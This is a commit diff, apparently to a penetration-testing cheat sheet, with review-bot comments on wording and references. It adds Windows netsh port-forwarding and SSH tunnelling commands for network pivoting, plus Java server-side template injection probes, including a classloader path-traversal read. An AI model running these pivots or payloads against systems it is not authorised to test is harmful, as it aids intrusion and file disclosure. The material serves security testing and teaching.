Windows port forwarding - Netsh

Swissky 2018-06-09 18:56:19 +02:00
parent 4ad7c70e89
commit a7439d812d
2 changed files with 21 additions and 3 deletions


@ -1,9 +1,21 @@
# Network Pivoting Techniques
## Windows netsh Port Forwarding
```powershell
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
```
1. listenaddress is a local IP address waiting for a connection.
2. listenport local listening TCP port (the connection is waited on it).
3. connectaddress is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
4. connectport is a TCP port to which the connection from listenport is forwarded to.
## SSH
### SOCKS Proxy
```
```bash
ssh -D8080 [user]@[host]
ssh -N -f -D 9000 [user]@[host]
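Review bot: The new netsh section documents only `add v4tov4`, so a reader has no way to confirm or undo the rule. Portproxy rules persist across reboots, so add `netsh interface portproxy show all` and the matching `netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110` beneath the example, and state that the commands need an elevated prompt. The example line also sets listenaddress and connectaddress to the same 10.1.1.110, which the numbered list does not explain, and it orders its parameters differently from the template line above it. List item 2 is missing its verb ("listenport is the local listening TCP port").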
@ -12,13 +24,13 @@ ssh -N -f -D 9000 [user]@[host]
```
### Local Port Forwarding
```
```bash
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
```
### Remote Port Forwarding
```
```bash
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
```
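Review bot: In the Remote Port Forwarding command, `[localhost]` is bracketed like a placeholder, while the Local Port Forwarding line names the same position `[dsthost]`. Pick one naming scheme for both commands and add a one-line description of each field, as the netsh section does with its numbered list. The switch of the fences to `bash` is fine.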
@ -98,3 +110,4 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
## Thanks to
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
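Review bot: The added Windows OS Hub reference is linked over plain `http://` while the entry above it uses `https://`. Use the HTTPS URL if the site serves one, so the reference list is consistent.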


@ -24,7 +24,11 @@ e.g:
## Java
### Basic injection
```java
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
```
### Retrieve the systems environment variables.
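Review bot: The expressions added under "Basic injection" do not say which Java template engine or expression language they apply to, or what response shows that an expression was evaluated. `${7*7}` and `${{7*7}}` sit side by side with no note on how they differ. Add a short comment per line (engine, expected output) so the list can be used to confirm a finding and to write a test for the fix. The block is also fenced as `java` although its content is template expressions, not Java source, so a plain fence would avoid misleading highlighting.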
@ -176,3 +180,4 @@ Inject this template
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
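Review bot: The added VelocityServlet entry has no source or author after the title, unlike the three entries above it ("- TrustedSec", "by James Kettle (PortSwigger)", "- @albinowax"). Append the site or author name in the same "Title - Source" form.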